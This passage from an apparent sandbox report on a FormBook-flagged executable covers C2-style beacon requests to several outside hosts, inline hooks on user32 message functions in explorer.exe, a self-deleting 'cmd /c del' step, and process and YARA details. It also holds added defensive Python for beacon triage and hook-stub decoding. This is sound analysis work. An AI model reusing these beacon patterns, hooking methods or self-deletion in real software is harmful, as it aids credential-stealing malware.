                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

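All four HTTP sessions above share one shape: a GET from explorer.exe to a different Host each time, the same path /ngvm/ and the same second parameter 3fox=SBZ4, a long base64-looking first parameter, Connection: close, and a seven-byte all-zero body on a GET. None of the hosts answered with anything but a redirect or a 403, and the DNS Answers table shows two of them resolving through a Google-hosted redirect front and a NameSilo parking CNAME. The Python below is an added triage example, not part of the Joe Sandbox report; it embeds the DNS answers and HTTP sessions transcribed from the tables (constructed input, one A record per CNAME target), follows the CNAME chains, checks that each session's destination IP is one DNS actually returned for its Host, and matches each request line against a heuristic regular expression for that request shape. The regex, the field names and the "beacon"/"same campaign" labels are assumptions of this example, not statements the report makes.

```python
import re
from collections import defaultdict

# DNS answers and HTTP sessions transcribed from the report tables above and
# embedded here (constructed input) so the script runs offline.
DNS_ANSWERS = [  # (transaction id, name, record type, value)
    ("0xb120", "www.vacalinda.com", "CNAME", "ghs.googlehosted.com"),
    ("0xb120", "ghs.googlehosted.com", "A", "142.250.180.243"),
    ("0xc82d", "www.servicesbackyard.com", "CNAME", "parking.namesilo.com"),
    ("0xc82d", "parking.namesilo.com", "A", "168.235.88.209"),
    ("0xade4", "www.djspencer.com", "A", "159.89.244.183"),
    ("0xade4", "www.djspencer.com", "A", "164.90.244.158"),
    ("0xd817", "www.caravansforsalenorthwales.com", "CNAME", "caravansforsalenorthwales.com"),
    ("0xd817", "caravansforsalenorthwales.com", "A", "34.102.136.180"),
]

HTTP_SESSIONS = [  # (session, dest IP, process, request line, Host, request body, response status)
    (0, "142.250.180.243", r"C:\Windows\explorer.exe",
     "GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1",
     "www.vacalinda.com", bytes(7), 301),
    (1, "168.235.88.209", r"C:\Windows\explorer.exe",
     "GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1",
     "www.servicesbackyard.com", bytes(7), 302),
    (2, "159.89.244.183", r"C:\Windows\explorer.exe",
     "GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1",
     "www.djspencer.com", bytes(7), 301),
    (3, "34.102.136.180", r"C:\Windows\explorer.exe",
     "GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1",
     "www.caravansforsalenorthwales.com", bytes(7), 403),
]

# Heuristic (an assumption of this example): short lowercase path, one long
# base64-looking parameter, one short tag parameter, as in the four requests.
BEACON_RE = re.compile(
    r"^GET /(?P<path>[a-z0-9]{2,8})/\?"
    r"(?P<k1>[A-Za-z0-9]{2,8})=(?P<blob>[A-Za-z0-9+/]{40,}={0,2})"
    r"&(?P<k2>[A-Za-z0-9]{2,8})=(?P<tag>[A-Za-z0-9]{2,8}) HTTP/1\.[01]$"
)


def resolve(answers):
    """Follow CNAME chains in the answer rows; return {name: set of A-record IPs}."""
    cname, a_records = {}, defaultdict(set)
    for _txid, name, rtype, value in answers:
        if rtype == "CNAME":
            cname[name] = value
        elif rtype == "A":
            a_records[name].add(value)
    resolved = {}
    for name in set(cname) | set(a_records):
        target, hops = name, 0
        while target in cname and hops < 8:      # bounded walk guards against CNAME loops
            target, hops = cname[target], hops + 1
        resolved[name] = set(a_records.get(target, ()))
    return resolved


def classify_session(session, resolved):
    sid, dst_ip, process, request_line, host, body, status = session
    m = BEACON_RE.match(request_line)
    return {
        "session": sid,
        "host": host,
        "beacon_shape": m is not None,
        "path": m.group("path") if m else None,
        "tag": m.group("tag") if m else None,
        "nul_body": len(body) > 0 and not any(body),               # a GET carrying NUL bytes is not browser traffic
        "from_explorer": process.lower().endswith("explorer.exe"),  # only plausible after code injection
        "dns_consistent": dst_ip in resolved.get(host, set()),      # destination is one DNS returned for Host
        "c2_reply": status == 200,   # redirects and 403s are not panel replies: host parked, dead or not the C2
    }


def triage(answers, sessions):
    resolved = resolve(answers)
    findings = [classify_session(s, resolved) for s in sessions]
    beacons = [f for f in findings if f["beacon_shape"]]
    return {
        "beacons": len(beacons),
        "same_campaign": len({f["path"] for f in beacons}) == 1 and len({f["tag"] for f in beacons}) == 1,
        "c2_hosts": [f["host"] for f in findings if f["c2_reply"]],
        "findings": findings,
    }


if __name__ == "__main__":
    result = triage(DNS_ANSWERS, HTTP_SESSIONS)
    for f in result["findings"]:
        print(f)
    print({k: v for k, v in result.items() if k != "findings"})
```

Run against the transcribed data every session matches the shape, all four share path ngvm and tag SBZ4, every destination IP agrees with DNS, and no host returned a 200, so nothing in this capture is a live panel exchange; the same path and tag across rotating Hosts is the pattern worth turning into a proxy-log search.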

Code Manipulations

User Modules

Hook Summary

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
GetMessageA    INLINE     explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xED
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xED
GetMessageW    INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xED
GetMessageA    INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xED
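The table lists, for each hooked user32.dll export in explorer.exe, the first six bytes the sandbox found at the function entry. A hook scanner does two things with such bytes: it diffs the in-memory prologue against the same bytes read from the module on disk, and, when they differ, it tries to decode the patch as one of the usual x64 jump stubs so that the hook target can be followed. The Python below is an added example, not code from the report or from Joe Sandbox; the stub encodings it recognises are the common ones (jmp rel32, jmp [rip+disp32], mov rax/jmp rax, push/ret), the addresses and the "clean" prologue in the demo are constructed, and the six bytes per export are those from the table. None of the reported byte strings is one of those stubs, so for them the function can only report an unrecognised modification that needs the on-disk copy to characterise.

```python
import struct

MASK64 = (1 << 64) - 1

# The six "New Data" bytes the report lists for each hooked user32 export.
REPORTED = {
    "PeekMessageA": bytes.fromhex("488bb88aaeed"),
    "PeekMessageW": bytes.fromhex("488bb8822eed"),
    "GetMessageW":  bytes.fromhex("488bb8822eed"),
    "GetMessageA":  bytes.fromhex("488bb88aaeed"),
}


def decode_stub(prologue, address):
    """Recognise the usual x64 inline-hook stubs placed at `address`.

    Returns (kind, target) for a recognised stub, else None. `target` is the
    hook destination, except for jmp [rip+disp32] with a non-zero displacement,
    where it is the address of the pointer slot the scanner must read next.
    """
    p = prologue
    if len(p) >= 5 and p[0] == 0xE9:                        # E9 rel32: jmp rel32
        rel = struct.unpack_from("<i", p, 1)[0]
        return "jmp rel32", (address + 5 + rel) & MASK64
    if len(p) >= 6 and p[:2] == b"\xff\x25":                # FF 25 disp32: jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", p, 2)[0]
        if disp == 0 and len(p) >= 14:                      # pointer stored right after the instruction
            return "jmp [rip]", struct.unpack_from("<Q", p, 6)[0]
        return "jmp [rip+disp32] (pointer slot)", (address + 6 + disp) & MASK64
    if len(p) >= 12 and p[:2] == b"\x48\xb8" and p[10:12] == b"\xff\xe0":  # mov rax, imm64; jmp rax
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", p, 2)[0]
    if len(p) >= 6 and p[0] == 0x68 and p[5] == 0xC3:       # 68 imm32; C3: push imm32; ret
        return "push imm32; ret", struct.unpack_from("<i", p, 1)[0] & MASK64
    return None


def check_export(name, observed, address, clean=None):
    """Classify one export's in-memory prologue.

    `clean` is the same number of bytes read from the module on disk (after
    relocation). Without it the prologue can only be checked for a known
    stub, and the verdict says so rather than guessing.
    """
    if clean is not None:
        n = min(len(observed), len(clean))
        if observed[:n] == clean[:n]:
            return {"export": name, "hooked": False, "stub": None, "target": None}
    stub = decode_stub(observed, address)
    if stub:
        return {"export": name, "hooked": True, "stub": stub[0], "target": stub[1]}
    if clean is None:
        return {"export": name, "hooked": None, "stub": "no reference copy, stub not recognised", "target": None}
    return {"export": name, "hooked": True, "stub": "modified, stub not recognised", "target": None}


if __name__ == "__main__":
    # Reported bytes: the page gives no on-disk copy, so only stub decoding applies.
    for export, data in REPORTED.items():
        print(check_export(export, data, address=0))
    # Constructed hooked prologue: jmp rel32 from 0x7FF800001000 to 0x7FF800002000,
    # compared against a constructed "clean" prologue (not the real user32 bytes).
    print(check_export("Demo", bytes.fromhex("e9fb0f0000"), 0x7FF800001000, clean=bytes.fromhex("4883ec28")))
```

The leading 0x48 in every reported string is a REX.W prefix, consistent with 64-bit code in a 64-bit explorer.exe, but six bytes are not enough to say what the patched instruction does; the practical next step is the diff against user32.dll on disk that `check_export` performs when given `clean`.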

System Behavior

General

Start time: 13:16:05
Start date: 11/06/2021
Path: C:\Users\user\Desktop\SX365783909782021.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\SX365783909782021.exe'
Imagebase: 0x400000
File size: 245880 bytes
MD5 hash: EE1F4A07B874AA6BA18D6AA0F83252D3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 13:16:06
Start date: 11/06/2021
Path: C:\Users\user\Desktop\SX365783909782021.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\SX365783909782021.exe'
Imagebase: 0x400000
File size: 245880 bytes
MD5 hash: EE1F4A07B874AA6BA18D6AA0F83252D3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:13:16:10
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff714890000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:13:16:28
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                      Imagebase:0xbb0000
                                                                                      File size:10240 bytes
                                                                                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:13:16:32
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x200000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:13:16:33
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis
